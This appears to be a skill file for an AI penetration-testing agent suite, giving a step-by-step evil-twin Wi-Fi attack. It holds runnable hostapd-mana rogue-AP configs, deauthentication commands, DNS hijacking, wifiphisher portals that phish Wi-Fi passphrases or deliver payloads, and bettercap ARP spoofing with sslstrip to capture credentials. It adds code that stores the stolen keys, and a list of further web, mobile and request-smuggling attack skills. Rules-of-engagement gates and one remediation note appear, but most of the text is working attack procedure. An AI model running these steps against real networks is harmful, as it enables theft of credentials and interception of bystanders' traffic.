Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X.
| name | evil-twin-karma |
| description | Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X. |
| allowed-tools | Bash Read Write |
| metadata | {"subdomain":"wireless","when_to_use":"evil twin, KARMA, Mana, rogue AP, captive portal, hostapd-mana, wifiphisher, airgeddon, PNL, probe response, client coercion, PSK phishing, open network MITM","tags":["evil-twin","karma","mana","rogue-ap","captive-portal","mitm"],"mitre_attack":"T1557, T1556, T1598"} |
RoE hard stop (mirrors the wireless workflow loaded into your system prompt): NEVER bring up an evil-twin AP on public airspace without
permitted_actions: evil_twinrecorded inplan/roe.jsonfor this session. Confirmiw reg getbefore any TX. This applies even onposture=loud— explicit operator approval is required.
hostapd-mana, wifiphisher (portal templates),
airgeddon (menu-driven alternative), dnsmasq, bettercap.plan/roe.json must contain permitted_actions: evil_twin and
valid regulatory TX authorization.Preferred-Network List (PNL) probe requests reveal SSIDs a device will auto-associate to. Passive harvest before standing up the rogue AP:
# Capture probe requests (passive, no TX required)
sudo airodump-ng --output-format csv -w /tmp/probes <mon-iface>
# Probe column shows client MAC → SSID pairs
# Or use bettercap's wifi.recon
sudo bettercap -iface <mon-iface> \
-eval "wifi.recon on; set wifi.show.sort clients desc; ticker on"
# Shows associated clients and their probe history
# KARMA universal: respond to ANY probe with a matching SSID.
# Mana selective: only respond to probes for SSIDs you choose
# (lower noise, avoids responding to enterprise SSIDs that
# require 802.1X — route those to wpa-enterprise-eap instead).
# Identify high-value targets:
# - Devices probing for open SSIDs (no PSK needed → immediate MITM)
# - Devices probing for PSK SSIDs you already know the passphrase for
# - Devices with MAC randomization disabled (OUI visible in probe SA)
# /tmp/mana.conf — open AP with KARMA/Mana response
cat > /tmp/mana.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
mana_enable=1
mana_credout=/tmp/mana_creds.txt
mana_loud=0
EOF
sudo hostapd-mana /tmp/mana.conf
# mana_loud=0 → Mana selective (probe-response-only)
# mana_loud=1 → KARMA universal (respond to all probes)
# For a PSK-matching evil twin (clone of a known WPA2 PSK network):
cat > /tmp/evil_twin_psk.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
wpa=2
wpa_passphrase=<KNOWN_PSK>
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
mana_enable=1
mana_credout=/tmp/mana_creds.txt
EOF
sudo hostapd-mana /tmp/evil_twin_psk.conf
# Deauth clients from the legitimate AP to accelerate association
# with the rogue AP. Requires permitted_actions: deauth_for_handshake_capture.
# Cross-reference deauth-pmf skill for PMF detection first.
sudo aireplay-ng --deauth 5 -a <LEGIT_BSSID> -c <CLIENT_MAC> <mon-iface2>
# Broadcast deauth (loud, posture=loud only):
sudo aireplay-ng --deauth 0 -a <LEGIT_BSSID> <mon-iface2>
# Note: broadcast deauth blocked by 802.11w/PMF; check PMF state first.
# dnsmasq: DHCP server + DNS for clients on the rogue AP
cat > /tmp/dnsmasq.conf << 'EOF'
interface=<iface>
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
address=/#/10.0.0.1
log-queries
EOF
sudo ip addr add 10.0.0.1/24 dev <iface>
sudo ip link set <iface> up
sudo dnsmasq -C /tmp/dnsmasq.conf --no-daemon &
# wifiphisher automated portal attack
sudo wifiphisher \
--essid "<TARGET_SSID>" \
--channel <CHANNEL> \
-p firmware-upgrade \
--handshake-capture /tmp/wpa2_handshake.pcap
# Built-in portal templates:
# firmware-upgrade → asks for Wi-Fi PSK to "install firmware"
# oauth-login → OAuth/social login credential capture
# wifi-connect → generic Wi-Fi reconnect with PSK prompt
# plugin_update → browser plugin update (payload delivery)
# Captured credentials written to wifiphisher's output log.
# For custom portal: --phishing-pages-directory /path/to/custom/
# Manual transparent MITM with bettercap after client connects:
sudo bettercap -iface <iface> \
-eval "
set http.proxy.sslstrip true;
set net.sniff.verbose false;
net.probe on;
arp.spoof on;
http.proxy on;
net.sniff on
"
# bettercap captures credentials from HTTP/stripped HTTPS sessions.
# Output to /tmp/bettercap_creds.log
Modern OS (Android 10+, iOS 14+, Windows 10+) use random MACs for probe requests, complicating targeting:
# De-anonymize via PNL analysis:
# 1. Capture probes over time; filter by sequence number continuity
# (same device reuses sequence counter across random MACs).
tshark -r /tmp/probes-01.cap -Y "wlan.fc.type_subtype == 4" \
-T fields -e wlan.sa -e wlan_mgt.ssid -e wlan.seq 2>/dev/null \
| sort -k1,1 -k3,3n > /tmp/probe_seqs.txt
# 2. Same device will show incrementing seq nums even with different MACs.
# 3. Once the device associates to your rogue AP, it uses its real MAC
# (most implementations reset randomization on association).
# Portal-captured credential
kg_add_node(
kind="credential",
label=f"Captive portal PSK for {ssid}",
props={
"key": f"portal-cred::{bssid}::{client_mac}",
"secret_type": "wpa_psk_phished",
"ssid": ssid,
"bssid": bssid,
"client_mac": client_mac,
"psk": psk,
"portal_template": template_name,
"captured_at": "<iso8601>",
"source": "wifiphisher-portal",
},
)
# PNL leak finding
kg_add_node(
kind="finding",
label="Client PNL Probe Leakage — Evil-Twin Viable",
props={
"key": f"pnl-leak::{client_mac}",
"severity": "high",
"exposed_ssids": [<ssid_list>],
"client_mac": client_mac,
"remediation": (
"Enable MAC randomization and disable 'auto-connect' for "
"saved networks. Use WPA3 with Protected Management Frames "
"to prevent deauth-driven roaming."
),
},
)
--deauth 1) over broadcast where possible.wpa-enterprise-eap skill — use instead for 802.1X/MGT targets.deauth-pmf skill — PMF detection and targeted deauth mechanics.wpa3-sae skill — Path D captive portal for SAE networks.Web application exploitation — the primary category skill for all web-based attacks. This is a routing skill: read this first to identify the attack type, then load the appropriate specialized sub-skill for detailed procedures. Covers 11 technique areas across injection, file access, authentication, and API exploitation.
HTTP Request Smuggling (HRS) — front-end / back-end parser disagreement attacks that desync the proxy stack. Covers CL.TE, TE.CL, TE.TE, CL.0, HTTP/2 downgrade (h2.cl, h2.te), pipelining, and connection-state pinning. Includes a confirm-desync gate, header obfuscation catalog, and minimal raw-socket Python harnesses (no smuggler.py available in sandbox).
Use when the engagement target is an Android (APK / AAB) or iOS (IPA) application. Covers static analysis (jadx, apktool, class-dump), dynamic instrumentation via Frida and Objection, SSL-pinning bypass, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported-component attacks, IPC redirection, WebView vulnerabilities, and biometric / Face ID / Touch ID bypass.
Web application enumeration hub — directory/file fuzzing, vhost discovery, API enumeration, CMS scanning, WAF detection, auth surface mapping, cookie audit.
Top-level index for the Decepticon 802.11 wireless attack suite. Routes the WirelessOperator to the correct leaf skill based on the target AP's crypto column (PSK / SAE / MGT / WPS) and engagement posture. BLE, Zigbee, Z-Wave, LoRaWAN, and sub-GHz live under iot/ by design — link provided below to prevent duplication.
Exploitation finding documentation — initial access reports, exploit chain documentation, CVSS v4.0 scoring, shell/credential inventory, detection gap analysis.